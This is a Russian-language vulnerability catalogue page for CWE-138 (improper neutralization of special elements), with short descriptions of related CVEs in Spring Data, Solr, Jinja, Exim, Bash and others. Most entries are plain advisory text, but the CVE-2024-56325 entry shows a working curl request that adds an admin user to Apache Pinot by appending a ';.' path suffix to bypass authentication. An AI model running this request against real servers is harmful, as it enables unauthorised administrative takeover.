CWE-138КлассЧерновик
Некорректная нейтрализация специальных элементов
Продукт получает входные данные от вышестоящего компонента, однако не нейтрализует или некорректно нейтрализует специальные элементы, которые при передаче нижестоящему компоненту могут интерпретироваться как управляющие элементы или синтаксические маркеры.
Открыть в каталоге с фильтром CWE →Связанные CAPEC
Связанные уязвимости
CVE-2024-56325Проблема обхода аутентификации
Если путь не содержит / и содержит ., аутентификация не требуется.
Ожидаемый пример нормального запроса и ответа
curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users
Возврат: {"code":401,"error":"HTTP 401 Unauthorized"}
Зловредный запрос и пример ответа
curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Возврат: {"users":{}}
Новый пользователь добавляется, обходя аутентификацию, что позволяет пользователю управлять Pinot.
CVE-2018-1273Spring Data Commons, версии до 1.13 до 1.13.10, 2.0 до 2.0.5 и старые неподдерживаемые версии, содержат уязвимость привязки свойства, вызванную неправильной нейтрализацией специальных элементов. Неаутентифицированный удалённый злоумышленник (или атака) может предоставить специально созданные параметры запроса для ресурсов HTTP, поддерживаемых Spring Data REST, или использовать привязку полезной нагрузки запроса на основе проекции Spring Data, что может привести к атаке выполнения кода удалённо.
CVE-2017-12629Удаленное выполнение кода происходит в Apache Solr до версии 7.1 с Apache Lucene до версии 7.1 путем эксплуатации XXE в сочетании с использованием команды Config API add-listener для достижения класса RunExecutableListener. Elasticsearch, хотя и использует Lucene, НЕ уязвим для этого. Обратите внимание, что уязвимость расширения XML external entity возникает в XML Query Parser, который доступен по умолчанию для любого запроса с параметрами deftype=xmlparser и может быть использован для загрузки вредоносных данных в обработчик запросов /upload или как Blind XXE с использованием ftp wrapper для чтения произвольных локальных файлов с сервера Solr. Также обратите внимание, что вторая уязвимость связана с удаленным выполнением кода с использованием RunExecutableListener, доступного во всех затронутых версиях Solr.
CVE-2014-4650Модуль CGIHTTPServer в Python 2.7.5 и 3.3.4 неправильно обрабатывает URL-адреса, в которых URL-кодирование используется для разделителей путей, что позволяет удаленным злоумышленникам читать исходный код сценария или проводить атаки с обходом каталогов и выполнять непреднамеренный код через специально созданную последовательность символов, как продемонстрировано разделителем %2f.
CVE-2019-10906В Pallets Jinja до версии 2.10.1 str.format_map позволяет избежать песочницы.
CVE-2016-10745В Pallets Jinja до версии 2.8.1 str.format допускает выход из песочницы.
CVE-2023-42117Уязвимость Improper Neutralization of Special Elements в Exim при удаленном выполнении кода. Эта уязвимость позволяет удаленным злоумышленникам выполнять произвольный код на уязвимых установках Exim. Для эксплуатации этой уязвимости не требуется аутентификация.
Конкретный недостаток существует в службе smtp, которая по умолчанию прослушивает TCP-порт 25. Проблема возникает из-за отсутствия надлежащей проверки предоставленных пользователем данных, что может привести к повреждению памяти. Злоумышленник может использовать эту уязвимость для выполнения кода в контексте текущего процесса. Ранее ZDI-CAN-17554.
CVE-2022-2429Плагин Ultimate SMS Notifications for WooCommerce для WordPress подвержен CSV-инъекции в версиях до 1.4.1 включительно через функциональность «Export Utility». Это позволяет аутентифицированным злоумышленникам, таким как подписчик, добавлять ненадежные данные в платежную информацию, например, в свое имя, которые будут встроены в экспортируемый CSV-файл, запускаемый администратором, и могут привести к выполнению кода, когда эти файлы загружаются и открываются в локальной системе с уязвимой конфигурацией.
CVE-2024-38133Уязвимость повышения привилегий в ядре Windows.
CVE-2019-9924rbash в Bash версий до 4.4-beta2 не запрещал пользователю оболочки изменять BASH_CMDS, что позволяло пользователю выполнять любую команду с правами оболочки.
CVE-2026-32178Неправильная нейтрализация специальных элементов в .NET позволяет несанкционированному злоумышленнику выполнять спуфинг по сети.
CVE-2026-26129Получение конфиденциальной информации в Microsoft 365 Copilot
CVE-2024-51500Прошивка Meshtastic - это прошивка устройства для проекта Meshtastic. Прошивка Meshtastic не проверяет пакеты, утверждающие, что они получены со специального широковещательного адреса (0xFFFFFFFF), что может привести к неожиданному поведению и возможности DDoS-атак на сеть. Злоумышленник может создать пакет с этого адреса, что приведет к усилению этого одного сообщения во всех узлах сети, отправляющих несколько сообщений. Такая атака может привести к ухудшению производительности сети для всех пользователей, поскольку доступная полоса пропускания будет израсходована. Эта проблема была решена в версии 2.5.6. Всем пользователям рекомендуется обновиться. Известных обходных путей для этой уязвимости нет.
CVE-2018-1274Spring Data Commons, версии с 1.13 до 1.13.10, с 2.0 до 2.0.5 и более старые неподдерживаемые версии, содержат уязвимость анализатора пути свойств, вызванную неограниченным распределением ресурсов. Не прошедший проверку подлинности удаленный злоумышленник может отправлять запросы к конечным точкам Spring Data REST или конечным точкам, использующим анализ пути свойств, что может привести к отказу в обслуживании (потребление ЦП и памяти).
CVE-2017-0902RubyGems версии 2.6.12 и более ранние уязвимы для перехвата DNS, что позволяет злоумышленнику MITM заставить клиент RubyGems загружать и устанавливать гемы с сервера, который контролирует злоумышленник.